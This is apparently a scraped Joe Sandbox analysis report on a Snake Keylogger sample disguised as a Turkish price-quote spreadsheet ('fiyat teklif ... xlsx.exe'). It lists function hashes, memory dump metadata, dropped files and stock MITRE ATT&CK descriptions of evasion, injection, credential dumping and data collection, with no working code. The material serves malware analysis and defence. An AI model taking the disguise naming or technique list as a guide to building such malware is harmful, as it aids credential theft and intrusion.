Opcode Fuzzy Hash: 86a2d4ad703eb5c7f20a039c4b2790c9af79923e388cd845792cc59cca8ff731
Instruction Fuzzy Hash: 0FE0D832D2036A5BCB0197B0DC048DEBB34EEE3611B454697D42067051E771260EC7B1

Function 0118D4CC Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4109016829.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1180000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f1f026e5d127f55d600e73578014e7192e7821d4b964a8018ca0b32917f623d
Instruction ID: 807826a972d1cf944b5abcb2fc2e8a18ec10133c264fa39c9233793afb53d891
Opcode Fuzzy Hash: 0f1f026e5d127f55d600e73578014e7192e7821d4b964a8018ca0b32917f623d
Instruction Fuzzy Hash: 49E06F92C082008BEB0CABEEA8220F8BF70CB93240701E0C7D089DB5A1D364E206DE12

Function 01182020 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4109016829.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1180000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c59b179bff33bf7517a170e975ace044f4e72bdd128ef29419507a4bb5e5d7df
Instruction ID: 65796c6b09c89dcb44715985316754312f8fafbe344ea9273c532254887c604a
Opcode Fuzzy Hash: c59b179bff33bf7517a170e975ace044f4e72bdd128ef29419507a4bb5e5d7df
Instruction Fuzzy Hash: 17D05B31D2022B57CB10E7A5DC044EFF738FED6262B544626D51437154FB702659C6E1

Function 01188258 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4109016829.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1180000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
Instruction ID: a9241a4f01687a863c4c03bd8a7b3afbc364498670da3702308cd8d08e0f99ee
Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
Instruction Fuzzy Hash: 0DC08C3320C1282AA63D708F7C40EB3BB8CC3C13F4A664137F91CE3200AA42AC8041F9

Function 0118A70D Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4109016829.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1180000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ac8ac55285c64b3c5903228a199783ef78da44a0b53e481d82ea903bb261ea3
Instruction ID: 4a544c87317c642a9056a87ff971495634351fdca54b16e32614663c601efdcf
Opcode Fuzzy Hash: 3ac8ac55285c64b3c5903228a199783ef78da44a0b53e481d82ea903bb261ea3
Instruction Fuzzy Hash: 9BD0677AB410189FCB149F98E8808DDB7B6FB9C221B048126EA25A3265C6319961DB50

Function 01185EA8 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4109016829.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1180000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50026e36819b2258eebf3478d21d35f66f37218cf41fc82aa0c7ee572881f83f
Instruction ID: 4999fff78c402da9ed82f69a0b6425d29e14885c14af0c6aa6141e9f7a66f2fc
Opcode Fuzzy Hash: 50026e36819b2258eebf3478d21d35f66f37218cf41fc82aa0c7ee572881f83f
Instruction Fuzzy Hash: 68D02B741283454BC315FB35F9C15143B35BB91304F4055B8F8048B01BED797C858752

Function 0118FC03 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4109016829.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1180000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06ef6e4372b1de3ee2285c8cc1147a47bea748bef4b1cb7544d228b72622f1de
Instruction ID: 4abdf3bfb3c64d7cf600ccf95abce4bce4ecf5b080a9b7653c61676968466a2f
Opcode Fuzzy Hash: 06ef6e4372b1de3ee2285c8cc1147a47bea748bef4b1cb7544d228b72622f1de
Instruction Fuzzy Hash: 1ED0677890411D8BCB28EF94EA856ECB7B0EB85314F0025E6990DB6240D7305A558F11

Function 01185EB8 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4109016829.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1180000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f2e6e70b531643d6fe37d504e301ec2d2093edd421a219b4319746371204262d
Instruction ID: e50aa7da0497e40969c417539da1d362e598b7255ebda152406d842a56c073ce
Opcode Fuzzy Hash: f2e6e70b531643d6fe37d504e301ec2d2093edd421a219b4319746371204262d
Instruction Fuzzy Hash: 4EC0127411430987C519FB75FAC5615775AABD0300F40A924F4095B11ADE747D845791

Non-executed Functions

Function 01181478 Relevance: 5.1, Strings: 4, Instructions: 62COMMON

Download Yara Rule

Strings

F, xrefs: 01181510
F, xrefs: 0118153A
F, xrefs: 01181557
4'dq, xrefs: 0118148B

Memory Dump Source

Source File: 00000003.00000002.4109016829.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1180000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID: 4'dq$F$F$F
API String ID: 0-462031106
Opcode ID: 305b02f18952555bdc882fdf94d55c8e20acb5c70d2fe7f3778b0a79e0b32adb
Instruction ID: 19657599b30e3f358930bd410d3a2e361277540aecd476ab762e6f3f9d00f3db
Opcode Fuzzy Hash: 305b02f18952555bdc882fdf94d55c8e20acb5c70d2fe7f3778b0a79e0b32adb
Instruction Fuzzy Hash: E1217575A002489FDB19FF74E44069E7BB2FF8A304F1095A9E415AB385DB359A06CF41

Function 01186088 Relevance: 5.0, Strings: 4, Instructions: 49COMMON

Download Yara Rule

Strings

\;dq, xrefs: 011860C6
\;dq, xrefs: 0118609E
\;dq, xrefs: 011860BA
\;dq, xrefs: 01186094

Memory Dump Source

Source File: 00000003.00000002.4109016829.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1180000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID: \;dq$\;dq$\;dq$\;dq
API String ID: 0-1855092343
Opcode ID: d5e2ddf0fb08c0fdca04818d8a27d8ae9a01dc617e9f14c9660c76fab839f917
Instruction ID: f90ac673b7a5e59cb0b4a037939bc306b2f62743c90f7bdf588ba75be4374b56
Opcode Fuzzy Hash: d5e2ddf0fb08c0fdca04818d8a27d8ae9a01dc617e9f14c9660c76fab839f917
Instruction Fuzzy Hash: 260171317140248FCB2DAE2DC444A2A77F6AF986A4715827AE601CB3F5DB71DC42CB55

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eumdg1we.agq.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ib5b2pti.hig.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_szrs0nhg.lhe.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xdzj5ivz.twf.psm1

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Windows Analysis Report
ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe

Function 0103CFD0 Relevance: 6.1, APIs: 4, Instructions: 130
threadCOMMON

Function 0103CFE0 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Function 07235D7C Relevance: 1.8, APIs: 1, Instructions: 250
processCOMMON

Function 07235D88 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Function 0103AD48 Relevance: 1.7, APIs: 1, Instructions: 193
COMMON

Function 0103590C Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Function 010344B0 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Function 07235AF9 Relevance: 1.6, APIs: 1, Instructions: 73
injectionCOMMON

Function 07235B00 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Function 07235960 Relevance: 1.6, APIs: 1, Instructions: 68
threadCOMMON

Function 07235BE8 Relevance: 1.6, APIs: 1, Instructions: 66
COMMON

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre